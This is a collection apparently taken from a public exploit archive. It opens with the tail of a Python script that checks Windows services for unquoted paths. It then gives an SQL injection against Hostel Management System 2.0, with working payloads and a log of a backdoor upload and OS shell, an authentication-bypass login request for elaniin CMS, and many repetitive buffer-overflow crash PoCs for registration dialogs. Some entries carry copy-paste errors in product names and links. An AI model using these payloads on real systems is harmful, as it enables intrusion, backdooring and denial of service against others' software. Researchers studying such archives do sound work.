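    # (LOAD_ORDER_GROUP, DEPENDENCIES) does not swallow the following line.
    for key, val in re.findall(r"^[ \t]+([A-Z_]+)[ \t]*:[ \t]*(.*)$", text, re.M):
        cfg[key] = val.strip()
    return cfg


def unquoted_path_candidates(binary_path_name):
    """For an unquoted image path containing spaces, return the executables
    the service control manager would try before the intended one (it splits
    at each space). A quoted or space-free path yields an empty list."""
    p = binary_path_name.strip()
    if not p or p.startswith('"'):
        return []
    # Arguments after the real ".exe" play no part in the lookup order.
    cut = p.lower().find(".exe")
    path = p[: cut + 4] if cut != -1 else p
    candidates = []
    idx = path.find(" ")
    while idx != -1:
        candidates.append(path[:idx] + ".exe")
        idx = path.find(" ", idx + 1)
    return candidates


def audit_service(text):
    """Summarise the risk-relevant fields of one `sc qc` dump."""
    cfg = parse_sc_qc(text)
    image = cfg.get("BINARY_PATH_NAME", "")
    cands = unquoted_path_candidates(image)
    return {
        "service": cfg.get("SERVICE_NAME"),
        "runs_as": cfg.get("SERVICE_START_NAME"),
        "auto_start": cfg.get("START_TYPE", "").startswith("2"),
        "unquoted": bool(cands),
        # The parent directory of each candidate is what the ACL review
        # must confirm is not writable by standard users.
        "check_write_access_on": cands,
    }


if __name__ == "__main__":
    for k, v in audit_service(SC_QC_OUTPUT).items():
        print("%-22s %s" % (k, v))
```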
-
Hostel Management System 2.0 - 'id' SQL Injection
# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection
# Google Dork: intitle: "Hostel management system"
# Date: 2020-01-03
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/hostel-management-system/
# Version: v2.0
# Tested on: Windows
# CVE : N/A

Description:
The Hostel Management System v2.0 application from PHPgurukul is vulnerable to SQL injection via the 'id' parameter on the full-profile.php page.

====================
1. SQLi
====================

http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1

The ?id parameter is vulnerable to SQL injection; it was also tested, and an unauthenticated user has the full ability to run system commands via --os-shell and fully compromise the system.

GET parameter 'id' is vulnerable.
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-3444' OR 1650=1650#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=1' OR SLEEP(5)-- slKU

    Type: UNION query
    Title: MySQL UNION query (NULL) - 29 columns
    Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---

[14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php
[14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php
[14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'john-pc\john'
os-shell>
-
SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
# Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1. Download and install BlueAuditor
2. Run the python operating script that will create a file (poc.txt)
3. Run the software "Register -> Enter Registration Code
4. Copy and paste the characters in the file (poc.txt)
5. Paste the characters in the field 'Key' and click on 'Ok'
6. BlueAuditor Crashed
'''

#!/usr/bin/python

buffer = "A" * 1000
payload = buffer

try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
# Exploit Title: Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1. Download and install Dnss
2. Run the python operating script that will create a file (poc.txt)
3. Run the software "Register -> Enter Registration Code
4. Copy and paste the characters in the file (poc.txt)
5. Paste the characters in the field 'Key' and click on 'Ok'
6. Dnss Crashed
'''

#!/usr/bin/python

buffer = "A" * 1000
payload = buffer

try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
# Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1. Download and install BlueAuditor
2. Run the python operating script that will create a file (poc.txt)
3. Run the software "Register -> Enter Registration Code
4. Copy and paste the characters in the file (poc.txt)
5. Paste the characters in the field 'Name' and click on 'Ok'
6. BlueAuditor Crashed
'''

#!/usr/bin/python

buffer = "A" * 1000
payload = buffer

try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)
# Exploit Title: NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1.Download and install NetShareWatcher
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.NetShareWatcher Crashed
'''

#!/usr/bin/python
# Build a 1000-byte string of 'A' and write it to poc.txt for pasting into the dialog
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
elaniin CMS 1.0 - Authentication Bypass
# Exploit Title: elaniin CMS 1.0 - Authentication Bypass
# Author: riamloo
# Date: 2020-01-02
# Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ )
# Software Link: https://github.com/elaniin/CMS/archive/master.zip
# Version: 1
# CVE: N/A
# Tested on: Win 10
# Description:
# Open-source Content Management System created with PHP + MySQL https://elaniin.com/
# Vulnerability: Attacker can bypass the login page and access the dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'
# Proof of Concept:

http://localhost/elaniin/login.php

POST /elaniin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 334
Referer: http://localhost/elaniin/login.php
Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8
Connection: close
Upgrade-Insecure-Requests: 1

email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
-
ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
# Exploit Title: ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1.Download and install ShareAlarmPro
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.ShareAlarmPro Crashed
'''

#!/usr/bin/python
# Build a 1000-byte string of 'A' and write it to poc.txt for pasting into the dialog
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
# Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1.Download and install Dnss
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.Dnss Crashed
'''

#!/usr/bin/python
# Build a 1000-byte string of 'A' and write it to poc.txt for pasting into the dialog
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
TextCrawler Pro3.1.1 - Denial of Service (PoC)
# Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC)
# Date: 2020-05-01
# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
# Software Link: https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe
# Exploit Author: Achilles
# Tested Version: 3.1.1
# Tested on: Windows 7 x64

# 1.- Run python code :TextCrawler.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open TextCrawler Pro
# 4.- Paste the content of EVIL.txt into the Field: 'License key'
# 5.- Click 'Activate' and you will see a crash.

#!/usr/bin/env python
# Build a 6000-byte string of 'A' (0x41) and write it to Evil.txt for pasting into the dialog
buffer = "\x41" * 6000
try:
    f = open("Evil.txt", "w")
    print("[+] Creating %s bytes evil payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created")
-
RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
# Exploit Title: RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1.Download and install RemShutdown
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.RemShutdown Crashed
'''

#!/usr/bin/python
# Build a 1000-byte string of 'A' and write it to poc.txt for pasting into the dialog
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
# Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1.Download and install Backup Key Recovery
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.Backup Key Recovery Crashed
'''

#!/usr/bin/python
# Build a 1000-byte string of 'A' and write it to poc.txt for pasting into the dialog
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
# Exploit Title: RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1.Download and install RemShutdown
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.RemShutdown Crashed
'''

#!/usr/bin/python
# Build a 1000-byte string of 'A' and write it to poc.txt for pasting into the dialog
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)
# Exploit Title: NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1.Download and install NBMonitor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.NBMonitor Crashed
'''

#!/usr/bin/python
# Build a 1000-byte string of 'A' and write it to poc.txt for pasting into the dialog
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
-
SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)
# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================
1.Download and install SpotFTP
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code"
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Name' and click on 'Ok'
6.SpotFTP Crashed
'''

#!/usr/bin/python
# Build a 1000-byte string of 'A' and write it to poc.txt for pasting into the dialog
buffer = "A" * 1000
payload = buffer
try:
    f = open("poc.txt", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")